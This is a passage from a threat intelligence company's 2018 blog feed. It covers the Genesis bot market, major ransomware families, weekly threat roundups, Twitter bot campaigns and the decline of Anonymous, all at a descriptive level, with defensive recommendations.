Finally, there were a worrying number of security assessments made available. This includes thousands of penetration tests, network diagrams, and security audits. We found a series of security documents belonging to a leading European supplier of electronic identification services used within the banking industry. These files contained in-depth security assessments, source code testing results, and vulnerability scanning reports that revealed details on insecure servers. These infrastructure reports exposed server locations and hosting IPs, missing software patches, port information, CVE numbers, and vulnerability descriptions that may allow an attacker to modify data, inject malicious code, or perform man-in-the-middle attacks. This type of information is a goldmine for attackers targeting organizations, and an attacker will typically spend weeks, if not a couple of months performing reconnaissance on their targets to glean this exact type of information.


Figure 4: Types of publicly-available security assessments


Download a copy of our report to learn more about the types of sensitive data these services are exposing, and how you can help to reduce this problem.


Want more Digital Shadows research? Subscribe to our threat intelligence emails here.

Genesis Botnet: The Market Claiming to Sell Bots That Bypass Fingerprinting Controls Tue, 03 Apr 2018 15:18:06 +0000 An emerging criminal market, Genesis store, provides more effective ways to impersonate a victim’s browser activity, focusing on individual bots rather than huge botnets, and monetizing them in a completely different way. Such an approach may allow criminals to utilize bots with higher efficiency, thus revealing new attack and fraud methods.


Figure 1: Adverts for the Genesis Store on a carding forum

Evolution of fingerprinting controls

Device fingerprinting collects information about a computer in order to identify an individual user. This is a pretty handy technique for retailers and banks who want to prevent fraudsters. Typically, anti-fraud solutions take known fraudulent activity and seek to block transactions that have a similar device fingerprint. This has become and cat-and-mouse affair, as criminals look to randomize their fingerprint with the help of various online services (many of which were covered in our report, Inside Online Carding Courses Designed for Cybercriminals ). In response, anti-fraud technologies take into account a broader set of characteristics.

Criminals, therefore, look to the machines of their victims in order to evade detection. However, obtaining this array of information is challenging. That’s where Genesis comes in. Genesis Store seeks to provide a single solution to emulate this approach, providing access to victims device footprints, accounts, and personal information. The store – registered in November 2017 and still in beta mode – claims to be the result of research conducted across the antifraud technologies used by 283 major banks and payments systems.


Access to a wide range of data

In order to emulate the legitimate users, Genesis provides customers with a wide range of information such as fingerprints, cookies, logs, saved passwords, and personal information.

This information is acquired from web injects, form grabbers and passwords saved in browsers. As these sources get more detailed or updated data, that data is automatically pushed into the store and made available to users. While this means that not all information is verified, it provides a more scalable business model for the administrators.


Figure 2: A screenshot of the Genesis Store


Browser plugin

For less than fifty dollars, users can buy a bot on the Genesis site, which includes the fingerprint, accounts, and cookies (unsurprisingly, the store does not use or sell any products connected with the Russian Commonwealth). For free you also get the Genesis Application, a browser plugin.

The plug-in claims to work with any operating system on Chrome-like browsers (Chrome, Iron, Iridium and others) and provides a seamless way to access the user fingerprint. The plug-in automatically updates and offers additional information on cookies and login data, as well as holder details, security answers, and card details.


Figure 3: The Genesis Security plugin


Innovative monetization techniques

Instead of focusing on selling large quantities of bots in bulk, Genesis focuses on the individual quality of each bot. The actors behind the botnet also have a very clear idea of how to monetize this. For example, their configurations must be used with their own plugin, and will not work without doing so. This is a similar business model to buying games for a Nintendo – you need to buy their own cartridges.


What to look out for

The site makes big claims about its capabilities and it will live and die by how it matches up to these promises. As with all new marketplaces, its success will also depend on user adoption, quality of goods, site security and user experience. Nevertheless, Genesis is still in beta mode yet appears to have picked up a good amount of interest since it was registered in November 2017. There are over 1500 bots available to buy and, at the time of analysis, eight bots had been purchased in the last 20 minutes.

As the site develops and grows out of beta mode and the claimed capabilities are realised, the shift to using more individual bots could have an impact on organization’s ability to combat fraud.

To keep up with our latest in threat intelligence, subscribe here.

RSA Conference 2018 – Digital Shadows Wed, 28 Mar 2018 05:04:16 +0000 RSA Conference is almost here! This year’s conference theme is “Now Matters,” looking at the quick impact threats can have to enterprises globally if we don’t find them today.

Today we see the perfect storm for digital risk and cyber threats. There are more exposure points, more sophisticated attacks, more things to protect, and increased regulations. Security leaders are faced with new challenges every day including:

  • Constant attacks from cyber criminals
  • Employees and third parties exposing sensitive data
  • Limited resources & security talent
  • Ineffective threat intelligence tools
  • Not knowing which digital risks to prioritize
  • Limited access to data sources and language
  • Disparate point solutions
  • Expanding attack surface

I started Digital Shadows to help organizations quickly identify when they are at risk without needing to deploy tons of threat intelligence resources to scan the open, deep, and dark web for threats to their business.

At RSA Conference 2018, our security specialists will be available to walk through how we help our clients quickly identify risks such as data loss, brand impersonation, cyber threats, credential exposure, and more. If you’re interested in a quick chat, book time with us here or visit us at Booth 5107 in the North Hall.

I’m looking forward to the awesome line up of events and activities at this year’s conference and I hope to see you at our party Tuesday night at City View @ Metreon. Cheers!

RSA Party Digital Shadows

The Five Families: The Most Wanted Ransomware Groups Tue, 27 Mar 2018 15:25:30 +0000 Last week we presented a webinar on “Emerging Ransomware Threats and How to Protect Your Data”. Here we discussed the latest ransomware threats and trends, as well as strategies organizations can take to strengthen their defenses and stay compliant.

The ransomware ecosystem has evolved continuously over recent years. There are new operational models such as ransomware-as-a-service (RaaS), and cybercriminals are leveraging remote entry vectors like remote desktop protocol (RDP) and JBoss application servers. Ransomware operators are also experimenting with self-propagation techniques to increase the impact of their attacks.  

With so many different variants in circulation, it can be hard to make sense of what the most critical ransomware threats are to your organization. Although we shouldn’t discount lesser known or less-popular variants, there are five main ransomware families that are prominent currently.



Locky has been active since early 2016 and has predominantly been delivered using spam emails, although the Nuclear and RIG exploit kits have also been used. This ransomware has been consistently updated, particularly with changes to the way encrypted files are appended, leading media reports to attribute different naming conventions to Locky versions, such as Zepto (named after the .zepto extention). Locky activity increased in December 2017 with the resumption of spam activity by the Necurs botnet, which delivered up to 47 million spam emails per day over the holiday period.



Cerber has been frequently developed and distributed since its inception in February 2016, with at least six different versions of the malware developed. Significantly, Cerber is run using a RaaS model, making it a highly automated operation both for actors using the platform and for servicing ransom payments and distributing decryptors to victims. The ransomware typically uses spam email and drive-by-downloads for delivery and has been associated with the RIG and Magnitude exploit kits. Cerber encrypts victim files with a random four-letter extension. Cerber RaaS customers can alter the specific ransom demands, although average prices for unlocking files fall between $1000 and $2000.



Figure 1: Cerber decryption service homepage


DMA Locker

First detected in January 2016, DMA Locker differs from traditional ransomware variants as it does not add a file extension to encrypted files, but instead adds an identifier to the file header. DMA Locker has been delivered through RDP as well as spam emails and the RIG exploit kit. Following a successful infection, the ransomware begins encrypting files if an Internet connection is available. However, if an internet connection is not available, the ransomware installs itself and waits for a connection to be established before encrypting files.



Crysis is distributed via spam emails and the compromised RDP services. Several variants of the ransomware exist to date. The first had decryption keys publicly released, enabling decryption without payment; however, recent variants that encrypt files with .arena, .cobra and .dharma extensions do not currently have publicly available decryption keys. Crysis also has additional capabilities such as harvesting information from the victim machine to send remotely to a command and control server. This included collecting credentials, instant messaging applications, webcam, and browser information.



Active since at least December 2015, SamSam has been used in targeted attacks against high-profile victims and large organizations in the United States, Europe and Asia. These include transport organizations, such as transit authorities, as well as the healthcare and education sectors. Unlike most variants that use phishing emails and exploit kits, SamSam exploits Internet-facing JBoss application servers, then harvests administrator credentials before self-propagating and infecting all the endpoints within a network. Each infected machine is held to ransom, with demands ranging from approximately $4,000 for one machine and $33,000 for all machines within a network. SamSam is believed to be operated by a group known as Gold Lowell.



Figure 2: Overview of the top five ransomware families


Although some ransomware operators have shifted to cryptocurrency mining to make their money, we’d be wrong to assume that ransomware is no longer a threat in 2018. With the above variants still in circulation, and the Colorado Department of Transportation recently experiencing a SamSam ransomware infection on 21 February 2018, it’s clear that the threat from ransomware is a long way away from subsiding.


To that end, there are several measures organizations should employ to ensure they are well-protected in 2018.  

  1. Regularly backup data and verify its integrity. Ensure that backups are remote from the main corporate network and machines they are backing up. Use cloud-based and physical backups.
  2. As SamSam has relied on vulnerable, external-facing servers, applying relevant patches and updates is recommended.
  3. A defense in depth strategy can aid mitigation. This includes Segmenting networks, firewalling-off SMB traffic, and restricting access to important data to only those who are required to have it.
  4. Develop and practice your ransomware playbook so that all members of the organization (operations, IT, security, legal, PR) know their role should the undesirable occur.

Subscribe to our weekly newsletter to get the latest news and research by Digital Shadows.

Shadow Talk Update – 03.26.2018 Mon, 26 Mar 2018 15:05:01 +0000 This week’s Shadow Talk discusses what the Cambridge Analytica revelations mean for disinformation and personal privacy, updates to Trickbot, Zeus Panda and Remnit trojans, City of Atlanta suffers from ransomware attack, and Dragonfly campaign attribution to Russian Government.

US pins energy-sector attacks on Russia-backed threat group

The United States government has named the threat group “Dragonfly” (aka Crouching Yeti, Energetic Bear) as responsible for attacks on the US energy sector over the past two years. The attribution was published in a technical alert that also connected Dragonfly to the Russian state. The multi-stage intrusion campaign of attacks was highly likely intended to gather intelligence, including credentials and files pertaining to industrial control systems (ICS) and associated systems; there was no indication of sabotage or disruption. The threat group allegedly used trusted third-party suppliers to attack its ultimate targets. The naming of Dragonfly is in line with the United States’ pervasive attribution for attacks, but is unlikely to shame the perpetrators into resisting more attacks. Instead, the attackers will likely adapt their tactics, techniques and procedures (TTPs).

Espionage group culls data from US entities with Asian interests

The suspected Chinese cyber espionage group “TEMP.Periscope” (aka Leviathan) has been cited as responsible for network intrusions of US entities with interests in the South China Sea region. To compromise networks and steal information, the group paired new tools with established tactics and techniques, including spearphishing emails and Microsoft Office exploits. The victims have not been named but, given the geopolitical conflict surrounding the South China Sea, the campaign was highly likely politically motivated and aimed at gathering intelligence. Some of the tools are associated with other suspected Chinese groups, which have also been linked to attacks on entities with interests in the same region. However, there was no indication the groups were actively collaborating, and identification of the groups is unconfirmed because many countries have interests in the South China Sea region. TEMP.Periscope has demonstrated high intent in its campaigns, and more attacks are highly likely.

Mining company extorted by thedarkoverlord

On 16 Mar 2018 breach reporting website DataBreaches[.]net reported that threat actor “thedarkoverlord” (TDO) claimed to have successfully compromised the systems of H-E Parts Morgan, a manufacturer of components for the mining industry. H-E Parts Morgan has not yet publicly commented on the reported breach; information disclosed to DataBreaches[.]net suggests the company refused TDO’s extortion demands. TDO has made no public announcement via social media in reference to this incident. This deviates from the standard modus operandi of the group, which tends to use Twitter to exert pressure on victims to pay an extortion fee.

Adware compromises supply chain, infects millions of Androids

The new adware family “RottenSys” successfully compromised a supply chain process and has infected almost five million Android devices since 2016. The malware masqueraded as a Wi-Fi service application on the devices, and used special permissions to download malicious components via a dropper. To display advertisements on devices, the attackers used a publicly available Android application virtualization framework. The perpetrators have highly likely accrued significant funds from their campaign; an estimated USD 115,000 has been earned since 12 Mar 2018 alone. As well as malvertising, the attackers appeared to be testing a new botnet using RottenSys’ command-and-control (C2) infrastructure. This botnet could be leased to other threat actors to bolster the attackers’ profits.

DDoS attack hits Russian Central Election Commission website

The website of the Russian Central Election Commission was reportedly hit by a distributed denial of service (DDoS) attack on 18 Mar 2018. The DDoS monitoring service DDoSMon reported the site was targeted using the Memcached amplification techniquea method recently adopted by a variety of threat actors. Attribution for the attack was unknown; no hacktivist or threat groups have claimed responsibility at the time of writing. The objective was almost certainly to cause disruption and degradation of service, as the timing coincided with the 2018 Russian presidential election.

APT-28 adopts new anti-sandbox evasion technique

Researchers at security company Palo Alto identified two attacks, on 12 and 14 Mar 2018, respectively, targeting an unnamed European government agency with an updated version of the “DealersChoice” Flash exploitation framework. The attacks were attributed to “APT-28” (aka Fancy Bear, Sofacy). Spearphishing emails referencing a security conference were sent with a Microsoft Word (.docx) document attached. A newly observed anti-sandbox evasion technique loaded a malicious Flash object only after a user had scrolled to the third page of the document. This ensured human interaction, and evolved from the previous tactic of a Flash object loading immediately upon the document’s opening. APT-28’s continued use of this new evasion technique is highly likely.

Pop-up Twitter Bots: The Shift to Opportunistic Targeting Thu, 22 Mar 2018 16:10:39 +0000 Since the furor surrounding Russia’s alleged use of Twitter bots to influence the 2016 presidential election in the United States, social media bots have been most commonly associated with carefully planned, long-term campaigns. However, we have observed a shift whereby automated bots increasingly are established to provide an opportunistic reaction to events or individuals, in very short and targeted campaigns. Advances in artificial intelligence will likely facilitate the creation of more believable throwaway bot networks with less investment needed to deliver expedient effects.

We recently worked on a fascinating Request for Information (RFI) from a client. Without disclosing too much, the organization suspected one of its employees had been targeted by Twitter bots. Following research, it appeared our client’s suspicions were correct: bots had been automatically spamming the employee’s Twitter page. Case closed and on to the next RFI.

However, as the dust settled from the task, we began thinking that this reflected a change in the way bots are used to spread disinformation. Bots and their many variants have been around for years and are used by a range of actors in many different ways, be it ISIS “ghost tweeting” its messages to give the appearance of a wider worldwide following, fake Chinese social media posts on Weibo intended to drown out messages about bad news and politically sensitive issues or celebrities using fake followers to increase their online influence. This particular case was interesting for two reasons:

  1. The focused targeting of an individual outside of significant geopolitical event (albeit with crudely executed content)
  2. The short-term nature of the bots’ activity, initiated in response to a specific event and ended when the campaign’s ostensible goal was achieved

From the Masses to the Individual

Mass targeted disinformation is a well-known phenomenon, given press coverage of the growing number of “troll farms” springing up globally. Since a troll farm is staffed by humans, the farm’s masters can target individual users and engage them in complex and intelligent dialog that appears authentic in its spontaneity. The Holy Grail for this type of malicious actor would be a bot that could engage millions of users with the authenticity of a human troll.

In the case of nation states, campaigns may be part of long-term projects to influence other countries’ public discourse, such as the bots used to influence British politics in the 2016 EU referendum and subsequent election in 2017. This case was different. The bot campaign we were investigating appeared to have been established soon after particular actions by the targeted individual and disbanded immediately after the bots achieved their purpose. The “pop-up” nature of this bot campaign has been reflected in recent media stories: a widespread story about a Muslim woman walking past and ignoring injured victims of the March 2017 terror attack in Westminster has been attributed to a “fake news” bot campaign, and bots were observed attempting to influence the discourse about gun control laws following the February 2017 school shooting in Florida. This suggests actors are establishing bot networks to provide immediate, opportunistic reaction to events.


Where is this trend going in the future?

Technically, the key factor to watch is the development of artificial intelligence (AI), specifically regarding the Turing Test (a computer’s ability to convince a human user they are speaking to another human and not a computer). Given the textual, non-real-time medium of many social media platforms, computers have a distinct advantage in this area, and as early as 2014 some researchers claimed to have AI programs that could pass the Turing Test (Google “Eugene Goostman”).

With this level of authenticity, mass targeted disinformation campaigns become a realistic possibility for the disinformation peddler. These ideas have been expanded upon by authors such as Keir Giles (see: Handbook of Russian Information Warfare), who proposed scenarios whereby bots conduct mass targeted disinformation campaigns on the eve of a large-scale NATO troop mobilization. Such advances in AI also play into the hands of malicious actors creating bots for short-term purposes as they enable more believable bots to be set up swiftly, without spending months teaching bots what to say on a particular topic.

These ideas are not only interesting but important given the current influence that social media-driven news and propaganda currently have across the globe. This applies to nation states at election times, but it also relevant to businesses. You can read more about disinformation campaigns affecting organizations (as well as how to combat them) in a recent research paper of ours, “The Business of Disinformation.”

Subscribe to our weekly newsletter to get the latest news and research by Digital Shadows.

Cyber Security as Public Health Wed, 21 Mar 2018 16:09:19 +0000 Public health, one of the great 20th century ideas, has many instructive lessons for cyber security in the 21st. Let’s recap. Public health was defined by Charles-Edward Winslow in 1920 as:

“Public health is the Science and Art of preventing disease, prolonging life, and promoting health and efficiency through organized community effort for sanitation of the environment, the control of communicable disease, the education of the individual in personal hygiene, the organization of medical and nursing services for early diagnosis and preventive treatment of disease, and the development of the social machinery to insure everyone a standard of living adequate for maintenance of health, so organizing these benefits as to enable every citizen to realize his birthright of health and longevity”

While a lot has changed since 1920, including the use of the singular they, these statements still resonate today. The first statement mentions the interdisciplinary nature of the field. Cyber security truly is both an art and a science, which we will return to at the end of this blog. Let’s break down the key parts of Winslow’s definition:

This mission statement is comprehensive. It mentions both a preventative goal and a longevity goal: we need cyber security to not only be about preventing things but also encouraging the beneficial side effects of security for individuals, communities and marketplaces. The explicit reference to an organized community underlines the need for collective action. No matter how secure you may be as an organization or an individual, we work and play in a shared space. If that space resembles more the “Wild West” rather than an organized society, your experience will suffer irrespective of your own security posture. Winslow goes on to detail what needs to be done:


1.    Sanitation of the environment

  • Security Engineering, especially the definition and application of Secure Development Lifecycles to reduce software maintenance costs and increase reliability of software concerning software security related bugs.
  • Community action, sharing of security-related information, timely action on take down requests, appropriate ingress and egress filtering to prevent malicious traffic.


2.    Control of communicable disease

Hardening of systems to make the initial infection as difficult as possible (e.g., disallowing Macros, DDE-enabled documents, etc.) and in the eventual case of infection, to contain the spread as much as possible through segmenting the networks of key systems and monitoring for security events such as credential reuse.


3.    Education of the individual in personal hygiene

People are often the weakest link in security, not only the individual who clicks on a phishing email, but the system admin who is responsible for patching and secure configuration of systems. Training and education which is essential for individuals to use the Internet safely – both at work and at home – is essential.


4.    Organization of medical services for early diagnoses and preventative treatment of disease

The public and private sector need to work together in order for early signs of infection, e.g., destructive outbreaks like WannaCry or NonPetya, to be picked up and shared. The more collaboration there is, the better place we all are to limit the damage incurred by such incidents. Some public-sector organizations already provided comprehensive alerts, such as US-CERT.

Public health covers many different disciplines, just like cyber security. This stems from the important realization that there is not just one single focus area that is sufficient to improve public health. The success of vaccination programs, for example, depend on a wide range of disciplines. Cyber security, similarly, requires improvements not just in technical fields, although they are sorely needed! Politics, legal issues, regulations, economics, social organization all have a part to play. While we wrestle with the details in our daily work, it’s good to keep in mind the big picture.


Subscribe to our weekly newsletter to get the latest news and research by Digital Shadows.

Shadow Talk Update – 03.19.2018 Mon, 19 Mar 2018 14:15:48 +0000 This week’s Shadow Talk features the latest techniques in tax return fraud, claimed vulnerabilities in AMD chips, Slingshot malware targeting Mikrotik routers, and Greenflash Sundown Exploit Kit delivering Hermes ransomware.



Slingshot espionage campaign undetected for six years

A newly detected cyber espionage campaign used a compromised router as a foothold to drop malicious information-stealing components on to victims’ devices and networks. The “Slingshot” campaign has targeted almost 100 entities to date, predominantly in the Middle East and Africa. The earliest identified samples dated from 2012, which indicates the campaign has avoided detection for six years. Attribution was unconfirmed at the time of writing; however, the attackers appear to be highly skilled and well resourced, indicating they are potentially state-sponsored.


APT-15 observed targeting UK government contractor

On 10 Mar 2018, researchers at NCC Group reported new activity attributed to APT-15. Two operations impacted an unnamed UK government service provider, with attackers harvesting information pertaining to UK military and government departments. The group used two custom backdoors, custom information-gathering tools and native Windows tools to exfiltrate sensitive information. Following the first operation, which resulted in its ejection from the target network, the group used restructured tactics, techniques and procedures to re-enter the target system. The operations indicated a relatively well-resourced threat actor with a high level of intent to obtain precise information. Although APT-15 has previously been linked to China, there are insufficient indicators to support this attribution at the time of writing.


APT-28 updates operational toolkit

On 09 Mar 2018 cyber security company Kaspersky, published a report describing evolutions in the toolkit and activity of APT-28, a threat group associated with the Russian state. The report assessed the group now operates in distinct sub-divisions focused on targeting, development and coding. Researchers noted significant overlap of the group’s operations with other APT groups’ activity, including Russian-state–linked Turla. The report also described updates to the group’s operational toolkit and noted that the group has been observed targeting entities in the Middle East and Asia. APT-28’s operational development and its continued targeting of entities within the political or military landscape correlates to previous activity attributed to the group. Therefore, it remains likely that reports of operational activity and attacks attributed to the group will increase in the short to medium term (one to six months).


CTS Labs discloses 13 alleged AMD processor vulnerabilities

On 14 Mar 2018, CTS Labs detailed 13 vulnerabilities which allegedly allowed an attacker to install malware on AMD processors and permitted access to protected information located in processor chips. CTS Labs claimed it had provided AMD with 24 hours’ notice before publicly disclosing the vulnerabilities. As no technical details were released with the research, Digital Shadows could not analyze the alleged vulnerabilities.


MuddyWater group targets Turkey, Pakistan and Tajikistan

On 12 Mar 2018, Trend Micro, a cyber security company, reported that government and telecommunications entities in Tajikistan, as well as undisclosed sectors in Turkey and Pakistan, were targeted by activity attributed to “MuddyWater”, an espionage group. The group used similar tactics, techniques and procedures to its previous activity: primarily phishing emails with macro-enabled documents to achieve initial compromise. While technical indicators in this attack overlapped with those seen in historical MuddyWater activity, the PowerShell backdoor payload used in the recent attack had been updated, likely in an attempt to remain undetected. At the time of writing there is little information available pertaining to harvested data or the entities affected. The Saudi Arabian NCSC published an advisory on MuddyWater, indicating the group presents a notable threat to targeted entities.


Middlebox HTTP injection redirects deliver spyware

On 09 Mar 2018 the research organization CitizenLab reported two campaigns using PacketLogic deep packet inspection middleboxes to conduct injected HTTP redirects. Internet service provider customers in Egypt were redirected to pages containing cryptocurrency miners in a likely financially motivated attack. Selected Turkish users accessing legitimate domains using HTTP were redirected to download surveillance tools FinFisher or a variant of StrongPity, indicating the attack’s objective was information gathering. The initial infection vector against telecom infrastructure is unknown. Users are encouraged to avoid accessing and downloading content from domains using HTTP, as network traffic is unencrypted and vulnerable to “man in the middle” attacks.


Compromised BitTorrent client distributed by download server

On 13 Mar 2018, Microsoft Defender published research detailing a SmokeLoader campaign delivering CoinMiner, software which can be used to mine cryptocurrency from target systems. The activity produced approximately 500,000 attempted infections within a 12-hour period. The rapid infection rate was due to a compromised executable for BitTorrent client “MediaGet”, that was distributed via a legitimate program download server and operated as a legitimate program with a backdoor capacity which delivered the Smoke Loader downloader and dropped CoinMiner. It was unclear why Smoke Loader and CoinMiner, malware variants with high malicious detection rates by anti-virus solutions, were deployed in an operation which likely required significant planning regarding the initial infection vector.



Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.

Anonymous and the New Face of Hacktivism: What to Look Out For in 2018 Tue, 13 Mar 2018 15:03:05 +0000 The Anonymous collective has been the face of activism since 2008. Since then, the group’s membership, operations, and structure have changed significantly. In this blog, we examine the changes in Anonymous and look at how the group will continue to change in the coming years.

The Anonymous collective rose to fame in 2008 and 2009. Emerging from the quagmire of 4chan’s /b/ board, an imageboard for “random” content (Figure 1), the group quickly gained followers after ‘Project Chanology’, a 2008/9 campaign against Scientology. This blended relatively new tactics, like mass distributed denial of service (DDoS) attacks that rendered the main scientology websites offline, with old school phreaking and traditional protests.

Figure 1: The original /b/ post starting Project Chanology

The group continued to gain momentum, targeting opponents of internet piracy and websites of financial institutions that had withdrawn banking facilities from Wikileaks under OpPayback in 2010. The combination of widespread, disruptive DDoS attacks and their ability to publicize their campaigns led to Time magazine naming Anonymous as one of the 100 most influential people in the world in 2012.

Although the collective continued its operations, including OpIsrael and OpIcarus, the popularity and media attention gained by the group peaked in November 2016 during OpIsis and OpParis, both operations targeting supporters of Islamic State.

So, what happened to make “one of the most influential people” in the world fade from consciousness so quickly?

1. Anonymous has reached critical mass

Simply put, the group has become too big to be effective. Contrary to its original advertising and statements, the formative stages of the group were strictly hierarchical. Operations were organized on central forums and Internet relay chat (IRC) channels, with details approved by a series of moderators. This level or coordination enabled the organization and impact of their early operations.

Conversely, the family-friendly tactics (the Anonymous term for an operation that uses only legal tactics, such as reporting accounts for takedown) of OpIsis acted as a membership recruitment drive, leading to a huge influx of members with little to no technical capabilities. With such a large amount of people, focused operations have become harder to organize, as motives and skills divide. Older members talk about the dilution of the brand (Figure 2). The lack of a central organizational points means that operations and attacks are diverse, uncoordinated, and largely small scale.

Figure 2: Reddit users discuss the change in the Anonymous identity

2. Anonymous no longer encapsulates the cultural Zeitgeist

From 2010, Anonymous was synonymous with populist protest for the first half of the decade. The group’s brand – the Guy Fawkes mask from the 1984 ‘V for Vendetta’ graphic novel – was linked with the Occupy movement’s early protests in 2011, and the Million Mask March, held in 2013. Anonymous became associated with anti-establishment protests.

However, in 2018, this zeitgeist has changed. The Occupy movement has largely faded from public consciousness, and global politics has moved on. The proliferation of low level operations has changed the way the public view the collective, and without publicity the impact of their operations is greatly lessened. Furthermore, the lack of media coverage and the dilution of the brand have led to an exodus of the more technically capable members to smaller groups, leaving very little of the original collective behind.

3. Anonymous lacks a popular cause

When Anonymous began, the collective played to a relatively populist agenda. Chanology responded to growing media doubts about the nature of scientology, and OpPayback played on the public profile of Wikileaks. OpIcarus captured the anti-financial sector feeling as the news broke about high financial sector salaries despite austerity and the European debt crisis. OpIsis and OpParis both linked in with huge waves of outrage after the attacks in Paris in November 2015.

Since then, the collective has been unable to find a cause that simultaneously both unites members within the collective and captures the attention of the outside world. Smaller operations have been created – OpSyria, OpTurkey, OpDomesticTerrorism – but the main attack phase has rarely lasted beyond one month, and has not been adopted by more than two or three factions. Although the group originated as a vaguely anarchic collective, there is an inherent hero complex evident in the group’s collective language: without a cause, members are likely to move on.

Given this, what’s next for the collective, and for the threat from hacktivist groups?

1. Family-friendly and opportunistic attacks

It is highly likely that central Anonymous affiliates will continue to conduct legacy operations, such as OpIsis, OpSyria, and OpDomesticTerrorism. However, as the influence and capabilities of the group are waning, these are likely to be confined to “family-friendly” and opportunistic attacks, either reporting social media accounts, or claiming DDoS attacks against smaller companies with weak cyber security.

2. Regional groups

The dilution of the central brand has coincided with the rise of the number of regional and national groups. Factions such as AnonymousBrasil, AnonymousCatalunya, and AnonPlus are all smaller, more focused, and have closer to ties with regional politics. This enables them to mount persistent and targeted campaigns. Operations such as OpOlympicHacking were able to cause real disruption because AnonymousBrasil was able to coordinate activities amongst its members, and was linked to a traditional political objective. Although it is unlikely that the capabilities of these groups will grow outside of DDoS and website defacement attacks, their operations are likely to become longer and more targeted.

Figure 3: OpOlympicHacking banner, October 2016 (source: Twitter)

3. Breakaway Groups

Older members – and more nostalgic members – of the collective have already started to break away into smaller groups reminiscent of 2009. In 2017 there were a significant number of groups claiming to be LulzSec and AntiSec reborn. However, these groups are unlikely to reach the intent of their originals: a lack of media attention and impact mean that the members drift apart relatively quickly.

Figure 4: CyberGuerrilla were the first group to break away in 2014


The capabilities of the Anonymous collective were never technical: instead, they relied on causing disruption and gathering enough media attention to amplify their perceived influence. As we head into 2018 public attention has moved on, directed at threat groups with both the capability and intent to cause both destruction and disruption. The Anonymous brand is likely to live on in smaller, regional hacktivist groups who will target companies in line with regional and national geopolitical objectives, but the days of mass projects and mass campaigns are over.

Subscribe to our weekly newsletter to get the latest news and research by Digital Shadows.

Shadow Talk Update – 03.12.2018 Mon, 12 Mar 2018 15:09:50 +0000 This week’s Shadow Talk features more distributed denial of service (DDoS) attacks using Memcached servers, how disinformation is more than just a political concern, updates on the Spectre vulnerability following the release of a new proof of concept (POC) exploit, and more reporting on the historical network intrusion against the German government.

Memcached DDoS attacks break peak volume records

Attackers using Memcached reflection, a type of DDoS attack, have twice achieved the highest recorded peak volumes since 27 February. An attack on the code-sharing website GitHub reached 1.35Tbps, and a subsequent attack on an unnamed company in the United States peaked at 1.7Tbps. The peak was helped by the availability of internet-facing Memcached servers listening on user datagram protocol (UDP) port 11211 without traffic filtering. The media attention garnered by these attacks likely prompted opportunistic extortion attempts reported in the past week. Efforts have been made to reduce the number of internet-facing Memcached servers susceptible to this attack method, but the threat is unlikely to disappear in the next month.


Disinformation campaign aimed at Persian speakers

A disinformation campaign intended to influence Persian speakers and discredit Western media outlets has been in operation for approximately seven years. The campaign implicated some legitimate media outlets, such as the BBC, by establishing fake websites impersonating them. No malware was delivered in this campaign. Despite the use of disinformation campaigns for political objectives, the wide availability of tools and relatively low costs associated with performing these operations means that disinformation is also a threat to businesses in a variety of industries. Download a copy of our research report, The Business of Disinformation: A Taxonomy, to see tools actors can turn to when waging disinformation campaigns and what it means for organizations in the next year.


Researchers publish PoC exploit for SgxPectre

Researchers at the University of Ohio, in the United States, released PoC code for a vulnerability dubbed SgxPectre, a claimed variation of the “Spectre” vulnerability. SgxPectre enables unauthorized access to sensitive data protected by Intel’s Software Guard eXtensions (SGX). The vulnerability affects runtime libraries, meaning any program using SGX is potentially vulnerable. Release of any PoC code has previously encouraged threat actors to attempt exploitation of vulnerabilities, but in this case no such attempts have yet been detected. It is not known which types of information can be accessed by exploiting this vulnerability, or how easy it is to exploit.


Historical compromise of German government now linked to Turla

Attackers infected 17 computers in the German Federal Foreign Office with an undisclosed malware variant. The malware exfiltrated data and received commands using Microsoft Outlook. The intrusion, first reported 28 February 2018, affected the Foreign Office from March 2017 to December 2017. Attribution was initially made to the threat group “APT-28” (aka Fancy Bear), but journalists later cited the threat group “Turla”. The attack was said to be part of a wider campaign affecting multiple geographies and was likely conducted by a well-resourced group.


Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.

Ransomware in 2018: 4 Things to Look Out For Thu, 08 Mar 2018 23:59:00 +0000 Ransomware remains an active threat for organizations into 2018. Last year, large scale attacks like NotPetya and WCry wreaked havoc, shutting systems and costing millions of dollars in recovery. To develop effective mitigation strategies, we need to closely analyze the ever-evolving ransomware landscape. In particular, we expect developments in four broad areas, namely: ransomware delivery mechanisms, lateral movement tools, service models, and payment mechanisms.

Ransomware Developments in 2018

 1. Delivery mechanisms

Ransomware can be delivered by multiple vectors. To limit the need for initial user interaction, threat actors are using exposed internet facing infrastructure, like Remote Desktop Protocol (RDP) as an entry vector. This is partly due to availability, especially as RDP credentials or brute forcing tools are easily purchasable on criminal forums. However, there are also tactical and operational reasons for this: RDP allows machine access, meaning that threat actors can identify specific areas of valuable data or even move laterally across networks.

Ransomware in 2018

Figure 1: RDP brute forcing tool advertised for $4.25 on criminal marketplace

Other remote entry vectors that ransomware operators can target include Internet Information Services (IIS) or JBoss application servers.

 2. Self-propagation

Self-propagation mechanisms leverage the damaging impact of a single endpoint infection. Companies with locked down external networks may have flat internal networks, producing conditions for ransomware to self-propagate. Self-propagation is becoming popular among ransomware operators because:

  • Tools like PsExec and Windows Management Instrumentation Command can use batch script files to automate lateral movement within networks
  • Vulnerability exploits are available, for example SMB exploit “EternalBlue” used during WCry
  • Malicious groups can demand larger extortion amounts with multiple infections, or produce a highly damaging attack like NotPetya

 3. Ransomware as a service (RaaS)

Ransomware as a service (RaaS) models give threat actors without skills or resources the ability to deliver ransomware. Like other as a service models, users can sign up to platforms that provide backend infrastructure to manage operations. While RaaS is not new, the continued emergence of new variants shows the service remains in active development, and that a market still exists for it. This service model opens the ransomware marketplace to a wider variety of threat actors, while still remaining profitable for developers as they generally receive a percentage of each infection.

 4. Payment mechanisms

Ransomware variants deployed in financially motivated attacks live and die by profit generation. Payment mechanisms are currently an area of weakness for ransomware developers as they are not often automated or scalable. Ransomware operators tend to rely on email or TOR sites with cryptocurrency payments, which likely reduces operational effectiveness. Some variants have fully automated payment system infrastructure, from infection to payment, and delivery of decryption keys; however, these are relatively limited. Large, self-propagating attacks to date had poorly implemented payment infrastructure – as seen with the WCry attack that only had three Bitcoin wallets to receive payment due to a bug in the malware’s code.


Building your Ransomware Playbook

